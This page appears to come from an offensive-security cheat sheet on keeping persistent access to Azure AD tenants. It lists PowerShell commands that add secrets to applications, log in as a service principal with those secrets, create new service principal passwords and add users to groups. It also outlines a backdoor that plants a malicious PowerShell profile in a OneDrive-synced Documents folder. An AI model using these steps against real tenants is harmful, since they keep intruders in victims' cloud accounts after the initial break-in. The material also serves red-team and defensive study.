Skip to content

Azure AD - Persistence

Add Secrets to Application

  • Add secrets with lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1

    PS > . C:\Tools\Add-AzADAppSecret.ps1
    PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
    
  • Use secrets to authenticate as Service Principal

    PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
    PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
    PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
    

Add Service Principal

  • Generate a new service principal password/secret

    Import-Module Microsoft.Graph.Applications
    Connect-MgGraph 
    $servicePrincipalId = "<service-principal-id>"
    
    $params = @{
        passwordCredential = @{
            displayName = "NewCreds"
        }
    }
    Add-MgServicePrincipalPassword -ServicePrincipalId $servicePrincipalId -BodyParameter $params
    

Add User to Group

Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose

PowerShell Profile Backdoor Using KFM

OneDrive for Business Known Folder Move (KFM) is a feature in Microsoft OneDrive for Business that enables users and organizations to automatically redirect the contents of key Windows user folders; Desktop, Documents, and Pictures from their local PC to OneDrive.

A PowerShell profile is a script file that loads whenever you start a new PowerShell session (such as opening PowerShell or Windows Terminal). Users and administrators often customize their profiles to set aliases, environment variables, functions, or pre-load modules.

Requirements:

  • Files.ReadWrite.All privilege

Methodology:

Known Folder Move moves the user's Documents (and/or Desktop, Pictures) folder to OneDrive for Business, typically syncing:

C:\Users\<username>\Documents  C:\Users\<username>\OneDrive - <TenantName>\Documents

This means the PowerShell profile file (Documents\PowerShell\Microsoft.PowerShell_profile.ps1) will now be synced to OneDrive.

Push a malicious PowerShell profile at $HOME\Documents\PowerShell\Microsoft.PowerShell_profile.ps1.

References